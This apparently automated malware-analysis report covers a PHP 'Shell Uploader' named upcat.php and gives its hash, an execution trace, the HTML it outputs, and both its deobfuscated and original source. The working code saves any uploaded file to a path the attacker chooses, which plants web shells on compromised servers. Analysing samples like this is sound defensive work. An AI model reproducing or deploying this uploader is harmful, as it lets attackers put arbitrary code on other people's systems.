PHP Malware Analysis

upcat.php

md5: 9803ca73b5545225dbfbfaf73a0856e4

Deobfuscated PHP code

<?php

$files = @$_FILES["files"];
if ($files["name"] != '') {
    $fullpath = $_REQUEST["path"] . $files["name"];
    if (move_uploaded_file($files['tmp_name'], $fullpath)) {
        echo "<h1><a href='{$fullpath}'>Click Me!</a></h1>";
    }
}
echo "<html><head><title>Shell Uploader</title></head><body><form method=POST enctype=\"multipart/form-data\" action=\"\"><input type=hidden name=path><input type=\"file\" name=\"files\"><input type=submit value=\"Up\"></form></body></html>";

Execution traces

data/traces/9803ca73b5545225dbfbfaf73a0856e4_trace-1676261776.0397.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-13 02:16:41.937542]
1	0	1	0.000150	393512
1	3	0	0.000210	395712	{main}	1		/var/www/html/uploads/upcat.php	0	0
1		A						/var/www/html/uploads/upcat.php	1	$files = NULL
1	3	1	0.000245	395712
			0.000271	314256
TRACE END   [2023-02-13 02:16:41.937694]


Generated HTML code

<html><head><title>Shell Uploader</title></head><body><form method="POST" enctype="multipart/form-data" action=""><input type="hidden" name="path"><input type="file" name="files"><input type="submit" value="Up"></form></body></html>

Original PHP code

<?php $files = @$_FILES["files"];if ($files["name"] != '') {$fullpath = $_REQUEST["path"] . $files["name"];if (move_uploaded_file($files['tmp_name'], $fullpath)) {echo "<h1><a href='$fullpath'>Click Me!</a></h1>";}}echo '<html><head><title>Shell Uploader</title></head><body><form method=POST enctype="multipart/form-data" action=""><input type=hidden name=path><input type="file" name="files"><input type=submit value="Up"></form></body></html>';
?>